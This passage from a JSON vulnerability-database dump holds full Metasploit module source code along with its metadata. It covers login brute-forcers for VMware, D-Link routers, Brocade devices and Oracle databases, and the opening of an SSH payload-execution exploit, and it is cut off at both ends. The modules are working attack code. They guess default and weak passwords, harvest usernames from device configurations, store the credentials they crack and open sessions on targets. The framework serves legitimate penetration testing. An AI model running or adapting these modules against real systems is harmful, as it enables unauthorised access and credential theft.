\"/sdk\"]),\n Opt::RPORT(443)\n ])\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: 'vmware',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def run_host(ip)\n return unless is_vmware?\n each_user_pass { |user, pass|\n result = vim_do_login(user, pass)\n case result\n when :success\n print_good \"#{rhost}:#{rport} - Successful Login! (#{user}:#{pass})\"\n report_cred(ip: rhost, port: rport, user: user, password: pass, proof: result)\n return if datastore['STOP_ON_SUCCESS']\n when :fail\n print_error \"#{rhost}:#{rport} - Login Failure (#{user}:#{pass})\"\n end\n }\n end\n\n # Mostly taken from the Apache Tomcat service validator\n def is_vmware?\n soap_data =\n %Q|<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n <env:Body>\n <RetrieveServiceContent xmlns=\"urn:vim25\">\n <_this type=\"ServiceInstance\">ServiceInstance</_this>\n </RetrieveServiceContent>\n </env:Body>\n </env:Envelope>|\n\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URI']),\n 'method' => 'POST',\n 'agent' => 'VMware VI Client',\n 'data' => soap_data\n }, 25)\n\n unless res\n vprint_error(\"#{rhost}:#{rport} Error: no response\")\n return false\n end\n\n fingerprint_vmware(res)\n rescue ::Rex::ConnectionError => e\n vprint_error(\"#{rhost}:#{rport} Error: could not connect\")\n return false\n rescue => e\n vprint_error(\"#{rhost}:#{rport} Error: #{e}\")\n return false\n end\n\n def fingerprint_vmware(res)\n unless res\n vprint_error(\"#{rhost}:#{rport} Error: no response\")\n return false\n end\n return false unless res.body.include?('<vendor>VMware, Inc.</vendor>')\n\n os_match = res.body.match(/<name>([\\w\\s]+)<\\/name>/)\n ver_match = res.body.match(/<version>([\\w\\s\\.]+)<\\/version>/)\n build_match = res.body.match(/<build>([\\w\\s\\.\\-]+)<\\/build>/)\n full_match = res.body.match(/<fullName>([\\w\\s\\.\\-]+)<\\/fullName>/)\n\n if full_match\n print_good \"#{rhost}:#{rport} - Identified #{full_match[1]}\"\n report_service(:host => rhost, :port => rport, :proto => 'tcp', :sname => 'https', :info => full_match[1])\n end\n\n unless os_match and ver_match and build_match\n vprint_error(\"#{rhost}:#{rport} Error: Could not identify host as VMWare\")\n return false\n end\n\n if os_match[1].include?('ESX') || os_match[1].include?('vCenter')\n # Report a fingerprint match for OS identification\n report_note(\n :host => rhost,\n :ntype => 'fingerprint.match',\n :data => {'os.vendor' => 'VMware', 'os.product' => os_match[1] + \" \" + ver_match[1], 'os.version' => build_match[1] }\n )\n return true\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_http_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-25T02:11:55", "description": "This module attempts to authenticate to different D-Link HTTP management services. It has been tested on D-Link DIR-300 Hardware revision A, D-Link DIR-615 Hardware revision D and D-Link DIR-320 devices. It is possible that this module also works with other models.\n", "edition": 2, "cvss3": {}, "published": "2013-03-25T07:48:24", "type": "metasploit", "title": "D-Link DIR-300A / DIR-320 / DIR-615D HTTP Login Utility", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/SCANNER/HTTP/DLINK_DIR_300_615_HTTP_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'D-Link DIR-300A / DIR-320 / DIR-615D HTTP Login Utility',\n 'Description' => %q{\n This module attempts to authenticate to different D-Link HTTP management\n services. It has been tested on D-Link DIR-300 Hardware revision A, D-Link DIR-615\n Hardware revision D and D-Link DIR-320 devices. It is possible that this module\n also works with other models.\n },\n 'Author' =>\n [\n 'hdm', # http_login module\n 'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included\n ],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('USERNAME', [ false, \"Username for authentication (default: admin)\",\"admin\" ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"http_default_pass.txt\") ]),\n ])\n end\n\n def target_url\n proto = \"http\"\n if rport == 443 or ssl\n proto = \"https\"\n end\n \"#{proto}://#{rhost}:#{rport}#{@uri.to_s}\"\n end\n\n def is_dlink?\n response = send_request_cgi({\n 'uri' => @uri,\n 'method' => 'GET'\n })\n\n if response and response.headers['Server'] and response.headers['Server'] =~ /Mathopd\\/1\\.5p6/\n return true\n else\n return false\n end\n end\n\n def run_host(ip)\n\n @uri = \"/login.php\"\n\n if is_dlink?\n vprint_good(\"#{target_url} - D-Link device detected\")\n else\n vprint_error(\"#{target_url} - D-Link device doesn't detected\")\n return\n end\n\n print_status(\"#{target_url} - Attempting to login\")\n\n each_user_pass { |user, pass|\n do_login(user, pass)\n }\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: (ssl ? 'https' : 'http'),\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n # default to user=admin without password (default on most dlink routers)\n def do_login(user='admin', pass='')\n vprint_status(\"#{target_url} - Trying username:'#{user}' with password:'#{pass}'\")\n\n response = do_http_login(user,pass)\n result = determine_result(response)\n\n if result == :success\n print_good(\"#{target_url} - Successful login '#{user}' : '#{pass}'\")\n report_cred(ip: rhost, port: rport, user: user, password: pass, proof: response.inspect)\n\n return :next_user\n else\n vprint_error(\"#{target_url} - Failed to login as '#{user}'\")\n return\n end\n end\n\n def do_http_login(user,pass)\n begin\n response = send_request_cgi({\n 'uri' => @uri,\n 'method' => 'POST',\n 'vars_post' => {\n \"ACTION_POST\" => \"LOGIN\",\n \"LOGIN_USER\" => user,\n \"LOGIN_PASSWD\" => pass,\n \"login\" => \"+Log+In+\"\n }\n })\n return nil if response.nil?\n return nil if (response.code == 404)\n return response\n rescue ::Rex::ConnectionError\n vprint_error(\"#{target_url} - Failed to connect to the web server\")\n return nil\n end\n end\n\n def determine_result(response)\n return :abort if response.nil?\n return :abort unless response.kind_of? Rex::Proto::Http::Response\n return :abort unless response.code\n if response.body =~ /\\<META\\ HTTP\\-EQUIV\\=Refresh\\ CONTENT\\=\\'0\\;\\ url\\=index.php\\'\\>/\n return :success\n end\n return :fail\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-03T02:57:36", "description": "This module will test a range of Brocade network devices for a privileged logins and report successes. The device authentication mode must be set as 'aaa authentication enable default local'. Telnet authentication, e.g. 'enable telnet authentication', should not be enabled in the device configuration. This module has been tested against the following devices: ICX6450-24 SWver 07.4.00bT311, FastIron WS 624 SWver 07.2.02fT7e1\n", "edition": 2, "cvss3": {}, "published": "2015-03-06T14:41:14", "type": "metasploit", "title": "Brocade Enable Login Check Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2019-06-27T22:06:32", "id": "MSF:AUXILIARY/SCANNER/TELNET/BROCADE_ENABLE_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/telnet'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Telnet\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::CommandShell\n\n def initialize\n super(\n 'Name' => 'Brocade Enable Login Check Scanner',\n 'Description' => %q{\n This module will test a range of Brocade network devices for a\n privileged logins and report successes. The device authentication mode\n must be set as 'aaa authentication enable default local'.\n Telnet authentication, e.g. 'enable telnet authentication', should not\n be enabled in the device configuration.\n\n This module has been tested against the following devices:\n ICX6450-24 SWver 07.4.00bT311,\n FastIron WS 624 SWver 07.2.02fT7e1\n },\n 'Author' => 'h00die <mike[at]shorebreaksecurity.com>',\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n register_options(\n [\n OptBool.new('GET_USERNAMES_FROM_CONFIG', [ false, 'Pull usernames from config and running config', true])\n ], self.class\n )\n\n deregister_options('PASSWORD_SPRAY')\n\n @no_pass_prompt = []\n end\n\n def get_username_from_config(un_list,ip)\n [\"config\", \"running-config\"].each do |command|\n print_status(\" Attempting username gathering from #{command} on #{ip}\")\n sock.puts(\"\\r\\n\") # ensure that the buffer is clear\n config = sock.recv(1024)\n sock.puts(\"show #{command}\\r\\n\")\n\n # pull the entire config\n while true do\n sock.puts(\" \\r\\n\") # paging\n config << sock.recv(1024)\n # Read until we are back at a prompt and have received the 'end' of\n # the config.\n break if config.match(/>$/) and config.match(/end/)\n end\n\n config.each_line do |un|\n if un.match(/^username/)\n found_username = un.split(\" \")[1].strip\n un_list.push(found_username)\n print_status(\" Found: #{found_username}@#{ip}\")\n end\n end\n end\n end\n\n attr_accessor :no_pass_prompt\n attr_accessor :password_only\n\n def run_host(ip)\n un_list = []\n if datastore['GET_USERNAMES_FROM_CONFIG']\n connect()\n get_username_from_config(un_list,ip)\n disconnect()\n end\n\n if datastore['USERNAME'] #put the provided username on the array to try\n un_list.push(datastore['USERNAME'])\n end\n\n un_list.delete('logout') #logout, even when used as a un or pass will exit the terminal\n\n un_list.each do |un|\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: un,\n user_as_pass: datastore['USER_AS_PASS'],\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::Telnet.new(\n host: ip,\n port: rport,\n proxies: datastore['PROXIES'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: datastore['Timeout'],\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n banner_timeout: datastore['TelnetBannerTimeout'],\n telnet_timeout: datastore['TelnetTimeout'],\n pre_login: lambda { |s| raw_send(\"enable\\r\\n\", s.sock) },\n framework: framework,\n framework_module: self,\n ssl: datastore['SSL'],\n ssl_version: datastore['SSLVersion'],\n ssl_verify_mode: datastore['SSLVerifyMode'],\n ssl_cipher: datastore['SSLCipher'],\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n\n if result.success?\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n print_good(\"#{ip}:#{rport} - Login Successful: #{result.credential}\")\n start_telnet_session(ip,rport,result.credential.public,result.credential.private,scanner)\n else\n invalidate_login(credential_data)\n print_error(\"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\")\n end\n end\n end\n end\n\n def start_telnet_session(host, port, user, pass, scanner)\n print_status(\"Attempting to start session #{host}:#{port} with #{user}:#{pass}\")\n merge_me = {\n 'USERPASS_FILE' => nil,\n 'USER_FILE' => nil,\n 'PASS_FILE' => nil,\n 'USERNAME' => user,\n 'PASSWORD' => pass\n }\n\n start_session(self, \"TELNET #{user}:#{pass} (#{host}:#{port})\", merge_me, true, scanner.sock) if datastore['CreateSession']\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/telnet/brocade_enable_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-24T23:44:12", "description": "This module attempts to authenticate to different D-Link HTTP management services. It has been tested successfully on D-Link DIR-615 Hardware revision H devices. It is possible that this module also works with other models.\n", "edition": 2, "cvss3": {}, "published": "2013-03-27T08:26:23", "type": "metasploit", "title": "D-Link DIR-615H HTTP Login Utility", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/SCANNER/HTTP/DLINK_DIR_615H_HTTP_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'D-Link DIR-615H HTTP Login Utility',\n 'Description' => %q{\n This module attempts to authenticate to different D-Link HTTP management\n services. It has been tested successfully on D-Link DIR-615 Hardware revision H\n devices. It is possible that this module also works with other models.\n },\n 'Author' => [\n 'hdm', #http_login module\n 'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included\n ],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('USERNAME', [ false, \"Username for authentication (default: admin)\",\"admin\" ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"http_default_pass.txt\") ]),\n ])\n\n deregister_options('HttpUsername', 'HttpPassword')\n end\n\n def target_url\n proto = \"http\"\n if rport == 443 or ssl\n proto = \"https\"\n end\n \"#{proto}://#{rhost}:#{rport}#{@uri.to_s}\"\n end\n\n def run_host(ip)\n\n @uri = \"/login.htm\"\n\n if is_dlink?\n vprint_good(\"#{target_url} - D-Link device detected\")\n else\n vprint_error(\"#{target_url} - D-Link device doesn't detected\")\n return\n end\n\n print_status(\"#{target_url} - Attempting to login\")\n\n each_user_pass { |user, pass|\n do_login(user, pass)\n }\n end\n\n def is_dlink?\n # the tested DIR-615 has no nice Server banner, gconfig.htm gives us interesting\n # input to detect this device. Not sure if this works on other devices! Tested on v8.04.\n begin\n response = send_request_cgi({\n 'uri' => '/gconfig.htm',\n 'method' => 'GET',\n }\n )\n return false if response.nil?\n return false if (response.code == 404)\n\n # fingerprinting tested on firmware version 8.04\n if response.body !~ /var\\ systemName\\=\\'DLINK\\-DIR615/\n return false\n else\n return true\n end\n rescue ::Rex::ConnectionError\n vprint_error(\"#{target_url} - Failed to connect to the web server\")\n return nil\n end\n end\n\n # default to user=admin without password (default on most dlink routers)\n def do_login(user='admin', pass='')\n vprint_status(\"#{target_url} - Trying username:'#{user}' with password:'#{pass}'\")\n\n response = do_http_login(user,pass)\n result = determine_result(response)\n\n if result == :success\n print_good(\"#{target_url} - Successful login '#{user}' : '#{pass}'\")\n\n report_cred(ip: rhost, port: rport, user: user, password: pass, proof: response.inspect)\n\n return :next_user\n else\n vprint_error(\"#{target_url} - Failed to login as '#{user}'\")\n return\n end\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: (ssl ? 'https' : 'http'),\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def do_http_login(user,pass)\n begin\n response = send_request_cgi({\n 'uri' => @uri,\n 'method' => 'POST',\n 'vars_post' => {\n \"page\" => \"login\",\n \"submitType\" => \"0\",\n \"identifier\" => \"\",\n \"sel_userid\" => user,\n \"userid\" => \"\",\n \"passwd\" => pass,\n \"captchapwd\" => \"\"\n }\n })\n return if response.nil?\n return if (response.code == 404)\n\n return response\n rescue ::Rex::ConnectionError\n vprint_error(\"#{target_url} - Failed to connect to the web server\")\n return nil\n end\n end\n\n def determine_result(response)\n return :abort if response.nil?\n return :abort unless response.kind_of? Rex::Proto::Http::Response\n return :abort unless response.code\n if response.body =~ /\\<script\\ langauge\\=\\\"javascript\\\"\\>showMainTabs\$\\\"setup\\\"\$\\;\\<\\/script\\>/\n return :success\n end\n return :fail\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-23T04:15:43", "description": "This module attempts to authenticate against an Oracle RDBMS instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Due to a bug in nmap versions 6.50-7.80 may not work.\n", "edition": 2, "cvss3": {}, "published": "2011-03-14T22:13:57", "type": "metasploit", "title": "Oracle RDBMS Login Utility", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2020-02-21T13:41:42", "id": "MSF:AUXILIARY/SCANNER/ORACLE/ORACLE_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Nmap\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n\n # Creates an instance of this module.\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle RDBMS Login Utility',\n 'Description' => %q{\n This module attempts to authenticate against an Oracle RDBMS\n instance using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n\n Due to a bug in nmap versions 6.50-7.80 may not work.\n },\n 'Author' => [\n 'Patrik Karlsson <patrik[at]cqure.net>', # the nmap NSE script, oracle-brute.nse\n 'todb' # this Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.oracle.com/us/products/database/index.html' ],\n [ 'CVE', '1999-0502'], # Weak password CVE\n [ 'URL', 'http://nmap.org/nsedoc/scripts/oracle-brute.html']\n ]\n ))\n\n register_options(\n [\n OptPath.new('USERPASS_FILE', [ false, \"File containing (space-separated) users and passwords, one pair per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"oracle_default_userpass.txt\") ]),\n OptString.new('SID', [ true, 'The instance (SID) to authenticate against', 'XE'])\n ])\n\n end\n\n def minimum_nmap_version\n \"5.50\"\n end\n\n def run\n unless nmap_version_at_least? minimum_nmap_version\n print_error \"Installed Nmap version is not at least #{minimum_nmap_version}. Exiting...\"\n return false\n end\n print_status \"Nmap: Setting up credential file...\"\n credfile = create_credfile\n cred_count = 0\n each_user_pass(true) {|user, pass| credfile[0].puts \"%s/%s\" % [user,pass]; cred_count += 1 }\n credfile[0].flush\n nmap_build_args(credfile[1])\n print_status \"Nmap: Starting Oracle bruteforce with #{cred_count} credentials against SID '#{sid}'...\"\n nmap_run\n credfile[0].unlink\n if Rex::Parser.nokogiri_loaded\n nmap_hosts {|type,data| process_nokogiri_callback(type,data)}\n else\n nmap_hosts {|host| process_host(host)}\n end\n end\n\n def sid\n datastore['SID'].to_s\n end\n\n def nmap_build_args(credpath)\n nmap_reset_args\n nmap_append_arg \"-P0\"\n nmap_append_arg \"--script oracle-brute\"\n script_args = [\n \"tns.sid=#{sid}\",\n \"brute.mode=creds\",\n \"brute.credfile=#{credpath}\",\n \"brute.threads=1\"\n ]\n script_args << \"brute.delay=#{set_brute_delay}\"\n nmap_append_arg \"--script-args \\\"#{script_args.join(\",\")}\\\"\"\n nmap_append_arg \"-n\"\n nmap_append_arg \"-v\" if datastore['VERBOSE']\n end\n\n # Sometimes with weak little 10g XE databases, you will exhaust\n # available processes from the pool with lots and lots of\n # auth attempts, so use bruteforce_speed to slow things down\n def set_brute_delay\n case datastore[\"BRUTEFORCE_SPEED\"]\n when 4; 0.25\n when 3; 0.5\n when 2; 1\n when 1; 15\n when 0; 60 * 5\n else; 0\n end\n end\n\n def create_credfile\n outfile = Rex::Quickfile.new(\"msf3-ora-creds-\")\n if Rex::Compat.is_cygwin and self.nmap_bin =~ /cygdrive/i\n outfile_path = Rex::Compat.cygwin_to_win32(outfile.path)\n else\n outfile_path = outfile.path\n end\n @credfile = [outfile,outfile_path]\n end\n\n def process_nokogiri_callback(type,data)\n return unless type == :port_script\n return unless data[\"id\"] == \"oracle-brute\"\n return unless data[:addresses].has_key? \"ipv4\"\n return unless data[:port][\"state\"] == ::Msf::ServiceState::Open\n addr = data[:addresses][\"ipv4\"].to_s\n port = data[:port][\"portid\"].to_i\n output = data[\"output\"]\n parse_script_output(addr,port,output)\n end\n\n def process_host(h)\n h[\"ports\"].each do |p|\n next if(h[\"scripts\"].nil? || h[\"scripts\"].empty?)\n h[\"scripts\"].each do |id,output|\n next unless id == \"oracle-brute\"\n parse_script_output(h[\"addr\"],p[\"portid\"],output)\n end\n end\n end\n\n def extract_creds(str)\n m = str.match(/\\s+([^\\s]+):([^\\s]+) =>/)\n m[1,2]\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: opts[:status],\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def parse_script_output(addr,port,output)\n msg = \"#{addr}:#{port} - Oracle -\"\n @oracle_reported = false\n if output =~ /TNS: The listener could not resolve \\x22/n\n print_error \"#{msg} Invalid SID: #{sid}\"\n elsif output =~ /Accounts[\\s]+No valid accounts found/nm\n print_status \"#{msg} No valid accounts found\"\n else\n output.each_line do |oline|\n if oline =~ /Login correct/\n if not @oracle_reported\n report_service(:host => addr, :port => port, :proto => \"tcp\", :name => \"oracle\")\n report_note(:host => addr, :port => port, :proto => \"tcp\", :type => \"oracle.sid\", :data => sid, :update => :unique_data)\n @oracle_reported = true\n end\n user,pass = extract_creds(oline)\n pass = \"\" if pass == \"<empty>\"\n print_good \"#{msg} Success: #{user}:#{pass} (SID: #{sid})\"\n report_cred(\n ip: addr,\n port: port,\n user: \"#{sid}/#{user}\",\n password: pass,\n service_name: 'tcp',\n status: Metasploit::Model::Login::Status::SUCCESSFUL\n )\n elsif oline =~ /Account locked/\n if not @oracle_reported\n report_service(:host => addr, :port => port, :proto => \"tcp\", :name => \"oracle\")\n report_note(:host => addr, :port => port, :proto => \"tcp\", :type => \"oracle.sid\", :data => sid, :update => :unique_data)\n @oracle_reported = true\n end\n user = extract_creds(oline)[0]\n print_good \"#{msg} Locked: #{user} (SID: #{sid}) -- account valid but locked\"\n report_cred(\n ip: addr,\n port: port,\n user: \"#{sid}/#{user}\",\n service_name: 'tcp',\n status: Metasploit::Model::Login::Status::DENIED_ACCESS\n )\n elsif oline =~ /^\\s+ERROR: (.*)/\n print_error \"#{msg} NSE script error: #{$1}\"\n end\n end\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/oracle/oracle_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-13T21:33:51", "description": "This module connects to the target system and executes the necessary commands to run the specified payload via SSH. If a native payload is specified, an appropriate stager will be used.\n", "edition": 2, "cvss3": {}, "published": "2014-06-27T12:34:55", "type": "metasploit", "title": "SSH User Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2019-06-28T03:07:37", "id": "MSF:EXPLOIT/MULTI/SSH/SSHEXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::SSH\n\n attr_accessor :ssh_socket\n\n def initialize\n super(\n 'Name' => 'SSH User Code Execution',\n 'Description' => %q(\n This module connects to the target system and executes the necessary\n commands to run the specified payload via SSH. If a native payload is\n specified, an appropriate stager will be used.\n ),\n 'Author' => ['Spencer McIntyre', 'Brandon Knight'],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE,\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'PrependFork' => 'true',\n 'EXITFUNC' => 'process'\n },\n 'Payload' =>\n {\n 'Space' => 800000,\n 'BadChars' => \"\",\n 'DisableNops' => true\n },\n 'Platform' => %w[linux osx unix python bsd],\n 'CmdStagerFlavor' => %w[bourne echo printf wget],\n 'Targets' =>\n [\n [\n 'Linux x86',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux'\n }\n ],\n [\n 'Linux x64',\n {\n 'Arch' => ARCH_X64,\n 'Platform' => 'linux'\n }\n ],\n [\n 'Linux armle',\n {\n 'Arch' => ARCH_ARMLE,\n 'Platform' => 'linux'\n }\n ],\n [\n 'Linux mipsle',\n {\n 'Arch' => ARCH_MIPSLE,\n 'Platform' => 'linux',\n 'CmdStagerFlavor' => %w[curl wget]\n }\n ],\n [\n 'Linux mipsbe',\n {\n 'Arch' => ARCH_MIPSBE,\n 'Platform' => 'linux',\n 'CmdStagerFlavor' => %w[wget]\n }\n ],\n [\n 'Linux aarch64',\n {\n 'Arch' => ARCH_AARCH64,\n 'Platform' => 'linux'\n }\n ],\n [\n 'OSX x86',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'osx',\n 'CmdStagerFlavor' => %w[curl wget]\n }\n ],\n [\n 'OSX x64',\n {\n 'Arch' => 